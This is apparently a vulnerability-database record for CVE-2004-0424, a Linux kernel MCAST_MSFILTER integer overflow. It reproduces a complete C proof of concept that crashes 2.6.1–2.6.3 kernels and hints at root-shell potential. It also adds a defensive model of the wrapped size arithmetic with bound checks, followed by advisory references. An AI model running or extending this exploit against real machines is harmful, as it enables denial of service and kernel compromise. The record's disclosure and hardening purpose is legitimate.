Linux Kernel setsockopt MCAST_MSFILTER Integer Overflow Vulnerability

Vulnerability ID: 1107894
Vulnerability type: Buffer overflow
Published: 2004-04-21
Updated: 2007-05-25
CVE: CVE-2004-0424
CNNVD-ID: CNNVD-200407-013
Platform: Linux
CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/274
https://www.securityfocus.com/bid/10179
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200407-013
|Vulnerability details
An integer overflow exists in the ip_setsockopt function of Linux kernel 2.4.22 through 2.4.25 and 2.6.1 through 2.6.3. A local user can use the MCAST_MSFILTER socket option to cause a denial of service (crash) or execute arbitrary code.
|Exploit (PoC)
/* setsockopt proof of concept code by Julien TINNES (julien a.t cr0.org)
   vulnerability found (as always) by Paul Starzetz

   This is only a lame POC which will crash the machine, no root shell here.
   Maybe later, when everybody will have an updated box.

   It should work on 2.6.1, 2.6.2 and 2.6.3 kernels.

   Greets to Christophe Devine, too bad you weren't with me for this one.
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/types.h>

/* Fallbacks for libc headers that predate these definitions. */
#ifndef SOL_IP
#define SOL_IP 0
#endif
#ifndef MCAST_MSFILTER
#define MCAST_MSFILTER 48
#endif

/* mynumsrc and alloc_room control the overflow;
 * what we write can be controlled too (not needed
 * here but needed for a rootshell exploit).
 */
#define mynumsrc 0x100 /* 0x100 should be enough, can be tweaked */
#define alloc_room 1   /* let it allocate only one u32 */

/* Same layout as the kernel's struct group_filter, but with a
 * fixed-size source list so the whole request is one object. */
struct mygroup_filter
{
    __u32 gf_interface;                         /* interface index */
    struct sockaddr_storage gf_group;           /* multicast address */
    __u32 gf_fmode;                             /* filter mode */
    __u32 gf_numsrc;                            /* number of sources */
    struct sockaddr_storage gf_slist[mynumsrc]; /* source list */
};

int
main (void)
{
    int mysocket;
    int sockprot;
    struct mygroup_filter mygroup;
    int optlen;
    int i;
    struct sockaddr_in *psin;

    mygroup.gf_interface = 0;
    /* gf_numsrc is chosen so that the kernel's size computation wraps
     * around 2^32 and allocates room for only alloc_room u32 entries. */
    mygroup.gf_numsrc = (1 << 30) - 4 + alloc_room;

    mygroup.gf_group.ss_family = AF_INET;

    /* Mark every source entry as an IPv4 address. */
    for (i = 0; i < mynumsrc; i++)
    {
        psin = (struct sockaddr_in *) &mygroup.gf_slist[i];
        psin->sin_family = AF_INET;
    }

    mysocket = socket (PF_INET, SOCK_STREAM, 0);
    if (mysocket == -1)
    {
        perror ("Socket creation error: ");
        exit (1);
    }

    optlen = sizeof (struct mygroup_filter);

    printf ("Calling setsockopt(), this should crash the box...\n");
    sockprot = setsockopt (mysocket, SOL_IP, MCAST_MSFILTER, &mygroup, optlen);

    if (sockprot == -1)
    {
        perror ("Invalid setsockopt: ");
        exit (1);
    }

    return 0;
}

// milw0rm.com [2004-04-21]
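As an added illustration of the size arithmetic the PoC above abuses (this is not part of the original PoC or of the kernel source), the following user-space model computes the allocation size the way a 32-bit kernel does, beside the overflow-safe bound checks a handler should perform instead. The struct sizes (128-byte sockaddr_storage, 144-byte group_filter header, 16-byte ip_msfilter header), the 32912-byte request length and the function names are assumptions, not values taken from the page.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Sizes assumed for the 32-bit i386 kernels the PoC targets. */
#define SS_SIZE      128u  /* sizeof(struct sockaddr_storage) */
#define GF_HDR_SIZE  144u  /* assumed: group_filter minus one sockaddr_storage */
#define MSF_HDR_SIZE  16u  /* assumed: ip_msfilter minus one __u32 */

/* Vulnerable arithmetic: bytes for the kernel's internal filter (one __u32
 * per source) computed in 32-bit unsigned arithmetic. A large gf_numsrc
 * wraps the product modulo 2^32, so the allocation is tiny while the
 * per-source copy loop still runs gf_numsrc times. */
uint32_t msf_size_wrapping(uint32_t numsrc)
{
    return MSF_HDR_SIZE + numsrc * 4u;
}

/* Hardened form: bound numsrc before multiplying, so the size cannot wrap.
 * Returns false when the request must be rejected. */
bool msf_size_checked(uint32_t numsrc, uint32_t *size_out)
{
    if (numsrc > (UINT32_MAX - MSF_HDR_SIZE) / 4u)
        return false;
    *size_out = MSF_HDR_SIZE + numsrc * 4u;
    return true;
}

/* Second bound: the caller must actually have supplied numsrc entries in
 * the optlen bytes it passed; division again keeps the product from wrapping. */
bool numsrc_fits_optlen(uint32_t optlen, uint32_t numsrc)
{
    if (optlen < GF_HDR_SIZE)
        return false;
    return numsrc <= (optlen - GF_HDR_SIZE) / SS_SIZE;
}

int main(void)
{
    uint32_t poc_numsrc = (1u << 30) - 4u + 1u;  /* the PoC's gf_numsrc, alloc_room = 1 */
    uint32_t sz = 0;
    printf("wrapped size for gf_numsrc=0x%08x: %u bytes\n",
           poc_numsrc, msf_size_wrapping(poc_numsrc));   /* 4 bytes */
    printf("checked size: %s\n",
           msf_size_checked(poc_numsrc, &sz) ? "accepted" : "rejected");
    printf("fits the assumed 32912-byte request: %s\n",
           numsrc_fits_optlen(32912u, poc_numsrc) ? "yes" : "no");
    return 0;
}
```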
|Affected products
Slackware Linux 9.1
Slackware Linux -current
SGI ProPack 3.0
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
|References

Source: XF
Name: linux-ipsetsockopt-integer-bo(15907)
Link: http://xforce.iss.net/xforce/xfdb/15907

Source: BID
Name: 10179
Link: http://www.securityfocus.com/bid/10179

Source: ENGARDE
Name: ESA-20040428-004
Link: http://www.linuxsecurity.com/advisories/engarde_advisory-4285.html

Source: www.isec.pl
Link: http://www.isec.pl/vulnerabilities/isec-0015-msfilter.txt

Source: BUGTRAQ
Name: 20040420 Linux kernel setsockopt MCAST_MSFILTER integer overflow
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108253171301153&w=2

Source: SUSE
Name: SuSE-SA:2004:010
Link: http://www.novell.com/linux/security/advisories/2004_10_kernel.html

Source: OVAL
Name: oval:org.mitre.oval:def:11214
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:11214

Source: SGI
Name: 20040504-01-U
Link: ftp://patches.sgi.com/support/free/security/advisories/20040504-01-U.asc

Source: SLACKWARE
Name: SSA:2004-119
Link: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.659586

Source: REDHAT
Name: RHSA-2004:183
Link: http://www.redhat.com/support/errata/RHSA-2004-183.ht